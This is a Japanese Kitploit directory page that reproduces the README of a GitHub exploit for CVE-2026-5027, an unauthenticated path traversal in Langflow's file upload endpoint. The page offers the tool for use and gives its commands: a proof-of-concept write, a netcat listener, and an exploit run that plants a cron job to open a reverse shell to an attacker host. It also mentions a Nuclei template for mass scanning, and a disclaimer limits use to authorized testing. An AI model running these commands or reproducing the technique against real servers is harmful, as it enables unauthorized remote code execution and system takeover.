Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-5027
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2026-5027 - Langflow パストラバーサル

サイバーセキュリティの脆弱性: パストラバーサルエクスプロイト

任意ファイル書き込みによるRCE
未認証のリモートコード実行(ファイルアップロード経由)

CVE CVSS Exploit

📌 概要

Langflow は、ファイルアップロードエンドポイント(POST /api/v2/files)において重大なパストラバーサルの脆弱性の影響を受けます。

攻撃者は、../ シーケンスを含む悪意のあるファイル名を送信することで、サーバーのファイルシステム上の任意の場所に任意のファイルを書き込むことができます。

これは、例えばウェブシェルを配置したり crontab に注入したりすることで、完全なリモートコード実行(RCE) に容易に繋がります。


🛠️ 機能

  • ✅ 未認証での悪用(デフォルトの自動ログイン設定)
  • ✅ シンプルな概念実証(/tmp にテストファイルを書き込み)
  • ✅ cron による完全なリバースシェル(Linux)
  • ✅ 大量スキャン用の Nuclei テンプレート付属
  • ✅ トラバーサル深度のカスタマイズが容易

🚀 クイックスタート

1. 概念実証(安全なテスト)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

脆弱性がある場合の期待される出力:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. 完全なリバースシェル

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 リポジトリ構成

ファイル説明
CVE-2026-5027.pyメインの Python エクスプロイト(PoC + RCE)
CVE-2026-5027.yamlスキャン用の Nuclei テンプレート
README.mdこのファイル

🎯 使用例

cve-2026-5027

証明モード

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

リバースシェルモード

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ 免責事項

このリポジトリは、教育的および許可されたセキュリティテストの目的のみで提供されています。

責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。


レッドチームコミュニティのために ❤️ を込めて作られました

ツールをダウンロード